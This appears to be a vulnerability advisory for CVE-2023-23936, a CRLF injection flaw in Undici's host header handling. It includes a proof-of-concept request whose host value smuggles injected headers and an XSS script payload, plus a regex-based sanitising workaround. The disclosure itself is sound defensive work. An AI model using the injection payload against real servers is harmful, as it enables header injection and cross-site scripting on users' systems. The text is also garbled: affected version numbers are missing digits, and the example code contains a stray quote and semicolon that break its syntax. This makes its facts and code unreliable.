A critical vulnerability (CVE-2023-23936) has been discovered in Undici, a fast and efficient HTTP/1.1 client for Node.js, specifically concerning CRLF (Carriage Return Line Feed) Injection Attacks. Versions 2.. to 5.19. are affected by this vulnerability. A patch has been released with Undici v5.19.1 to address this issue.
Vulnerability Details
In versions 2.. through 5.19. of Undici, the library does not protect the host HTTP header from CRLF Injection vulnerabilities. This can allow an attacker to inject arbitrary HTTP headers and even perform HTTP response splitting attacks, which can lead to various security breaches such as sensitive information leakage, cross-site scripting, and more.
Here is a simple code snippet demonstrating the vulnerability
const { request } = require('undici')
const options = {
origin: 'http://localhost:300';,
path: '/',
method: 'GET',
headers: {
host: 'localhost:300\r\nContent-Length: \r\nContent-Type: text/html\r\n\r\n<script>alert("XSS")</script>', // Inject arbitrary headers and payload
},
};
request(options).then(({ statusCode, headers, body }) => {
console.log('response', statusCode, headers);
body.setEncoding('utf8');
body.pipe(process.stdout);
});
Solution and Mitigation
The vulnerability has been patched in Undici version 5.19.1. It is highly recommended to upgrade your Undici library to the latest version (v5.19.1) if you are using a vulnerable version.
For those who cannot upgrade their Undici version easily, a temporary workaround is to sanitize the headers.host string before passing it to Undici. Here's an example of how to do that:
function sanitizeHostHeader(hostHeader) {
return hostHeader.replace(/[\r\n]+/g, '');
}
const sanitaryHostHeader = sanitizeHostHeader(unsafeHostHeader);
options.headers.host = sanitaryHostHeader;
References
1. Undici - HTTP/1.1 client for Node.js
2. GitHub Issue - CRLF Injection vulnerability with host header
3. CVE-2023-23936 - Vulnerability Details
Conclusion
If you are using Undici in your Node.js applications, it's essential to either upgrade to v5.19.1 or use the workaround provided to protect your applications from possible CRLF injection attacks. By doing so, you will be enhancing the security of your applications and provide a safer experience for your users.
Timeline
Published on: 02/16/2023 18:15:00 UTC
Last modified on: 02/24/2023 19:14:00 UTC